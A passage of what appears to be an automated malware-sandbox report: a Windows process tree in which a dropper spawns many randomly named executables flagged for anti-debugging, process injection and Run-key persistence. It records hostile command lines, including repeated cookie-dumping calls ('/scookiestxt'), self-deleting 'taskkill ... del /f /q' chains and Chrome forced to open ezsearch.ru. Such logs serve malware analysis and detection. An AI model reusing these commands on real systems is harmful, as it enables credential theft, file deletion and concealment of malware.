C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:4260
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_5.exearnatic_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Users\Admin\AppData\Roaming\7652125.exe"C:\Users\Admin\AppData\Roaming\7652125.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784
-
-
C:\Users\Admin\AppData\Roaming\3778696.exe"C:\Users\Admin\AppData\Roaming\3778696.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4124 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:4752
-
-
-
C:\Users\Admin\AppData\Roaming\5925079.exe"C:\Users\Admin\AppData\Roaming\5925079.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4164
-
-
C:\Users\Admin\AppData\Roaming\8769103.exe"C:\Users\Admin\AppData\Roaming\8769103.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_6.exearnatic_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3668 -
C:\Users\Admin\Documents\FFjUwaq1iIz8jEoT3jXTT2G_.exe"C:\Users\Admin\Documents\FFjUwaq1iIz8jEoT3jXTT2G_.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4208
-
-
C:\Users\Admin\Documents\7pp5jxbY39jJYhWWIeaMx7Qr.exe"C:\Users\Admin\Documents\7pp5jxbY39jJYhWWIeaMx7Qr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2276 -
C:\Users\Admin\Documents\7pp5jxbY39jJYhWWIeaMx7Qr.exeC:\Users\Admin\Documents\7pp5jxbY39jJYhWWIeaMx7Qr.exe7⤵
- Executes dropped EXE
PID:4560
-
-
-
C:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exe"C:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2304 -
C:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exeC:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exe7⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exeC:\Users\Admin\Documents\lgv6zTWQ7L6TVr7lRCVCJTCH.exe7⤵PID:2388
-
-
-
C:\Users\Admin\Documents\MwtbK1POk82NmozS0BnBfPV2.exe"C:\Users\Admin\Documents\MwtbK1POk82NmozS0BnBfPV2.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4944
-
-
C:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exe"C:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exe"6⤵PID:648
-
C:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exeC:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exe7⤵PID:2240
-
-
C:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exeC:\Users\Admin\Documents\JS4F4nRDdszK6lMK38Ep_tqo.exe7⤵
- Executes dropped EXE
PID:2464
-
-
-
C:\Users\Admin\Documents\XkJSC5ixDkJb1rPMd3LcfZCv.exe"C:\Users\Admin\Documents\XkJSC5ixDkJb1rPMd3LcfZCv.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4396
-
-
C:\Users\Admin\Documents\c7Hb6tzXOIGRFte2abYPnnBY.exe"C:\Users\Admin\Documents\c7Hb6tzXOIGRFte2abYPnnBY.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4904 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im c7Hb6tzXOIGRFte2abYPnnBY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\c7Hb6tzXOIGRFte2abYPnnBY.exe" & del C:\ProgramData\*.dll & exit7⤵PID:2116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im c7Hb6tzXOIGRFte2abYPnnBY.exe /f8⤵
- Kills process with taskkill
PID:4496
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:5584
-
-
-
-
C:\Users\Admin\Documents\8PLi7IRYRVIXSHURBhMNutEk.exe"C:\Users\Admin\Documents\8PLi7IRYRVIXSHURBhMNutEk.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4872 -
C:\Users\Admin\Documents\8PLi7IRYRVIXSHURBhMNutEk.exe"C:\Users\Admin\Documents\8PLi7IRYRVIXSHURBhMNutEk.exe"7⤵PID:5440
-
-
-
C:\Users\Admin\Documents\EwraqqCU0HVAQRUvP9TYxhGI.exe"C:\Users\Admin\Documents\EwraqqCU0HVAQRUvP9TYxhGI.exe"6⤵
- Executes dropped EXE
PID:4824
-
-
C:\Users\Admin\Documents\tfdu8XtDOfXPnWd5eic44TKh.exe"C:\Users\Admin\Documents\tfdu8XtDOfXPnWd5eic44TKh.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4192 -
C:\Users\Admin\Documents\tfdu8XtDOfXPnWd5eic44TKh.exeC:\Users\Admin\Documents\tfdu8XtDOfXPnWd5eic44TKh.exe7⤵
- Executes dropped EXE
PID:6032
-
-
-
C:\Users\Admin\Documents\_v9lnYddXaDJtC6Q9yUec7k_.exe"C:\Users\Admin\Documents\_v9lnYddXaDJtC6Q9yUec7k_.exe"6⤵
- Executes dropped EXE
PID:4744 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru7⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:4104 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x70,0xb4,0xd8,0x64,0xdc,0x7ff86a024f50,0x7ff86a024f60,0x7ff86a024f708⤵PID:4776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1788 /prefetch:28⤵PID:2168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1836 /prefetch:88⤵PID:4376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1848 /prefetch:88⤵PID:4576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:18⤵PID:4676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2548 /prefetch:18⤵PID:4740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:18⤵PID:4544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:18⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:18⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:18⤵PID:5016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:88⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:88⤵PID:6004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:88⤵PID:4204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:88⤵PID:5868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:88⤵PID:5428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3360 /prefetch:88⤵PID:4288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:88⤵PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3500 /prefetch:88⤵PID:5688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:88⤵PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:88⤵PID:5588
-
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings8⤵PID:5376
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x218,0x21c,0x7ff7da4ca890,0x7ff7da4ca8a0,0x7ff7da4ca8b09⤵PID:6040
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:88⤵PID:5380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:88⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:88⤵PID:4564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5768 /prefetch:88⤵PID:5736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1680 /prefetch:88⤵PID:740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3324 /prefetch:88⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1704 /prefetch:88⤵PID:776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1996 /prefetch:88⤵PID:4212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:88⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1972 /prefetch:88⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:88⤵
- Executes dropped EXE
PID:2240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:88⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:88⤵PID:5168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:88⤵PID:5768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:88⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6504 /prefetch:88⤵PID:968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:88⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6540 /prefetch:88⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:88⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:88⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3848 /prefetch:88⤵PID:5500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:88⤵PID:5220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6672 /prefetch:88⤵PID:5920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:88⤵PID:3068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:88⤵PID:5828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:88⤵PID:2184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1972 /prefetch:88⤵PID:5448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:88⤵PID:5456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:88⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:88⤵
- Executes dropped EXE
PID:2388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,7099245986909661023,13626582316699798037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:88⤵PID:752
-
-
-
-
C:\Users\Admin\Documents\KJ8KOGKTrbSPADmv6gtY6AMA.exe"C:\Users\Admin\Documents\KJ8KOGKTrbSPADmv6gtY6AMA.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im KJ8KOGKTrbSPADmv6gtY6AMA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KJ8KOGKTrbSPADmv6gtY6AMA.exe" & del C:\ProgramData\*.dll & exit7⤵PID:5928
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im KJ8KOGKTrbSPADmv6gtY6AMA.exe /f8⤵
- Kills process with taskkill
PID:4320
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:5764
-
-
-
-
C:\Users\Admin\Documents\qwVH64SGS_tVOCmCfrN7rulp.exe"C:\Users\Admin\Documents\qwVH64SGS_tVOCmCfrN7rulp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5004 -
C:\Users\Admin\Documents\qwVH64SGS_tVOCmCfrN7rulp.exeC:\Users\Admin\Documents\qwVH64SGS_tVOCmCfrN7rulp.exe7⤵PID:1900
-
-
-
C:\Users\Admin\Documents\J1bgqjxv66LqSsnbDG0ILQWr.exe"C:\Users\Admin\Documents\J1bgqjxv66LqSsnbDG0ILQWr.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4976
-
-
C:\Users\Admin\Documents\v6KWaxKyS61D1G8XZ7rRXxt_.exe"C:\Users\Admin\Documents\v6KWaxKyS61D1G8XZ7rRXxt_.exe"6⤵
- Executes dropped EXE
PID:1896 -
C:\Program Files (x86)\Company\NewProduct\file4.exe"C:\Program Files (x86)\Company\NewProduct\file4.exe"7⤵
- Executes dropped EXE
PID:2204
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"7⤵
- Executes dropped EXE
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5308
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:4764
-
-
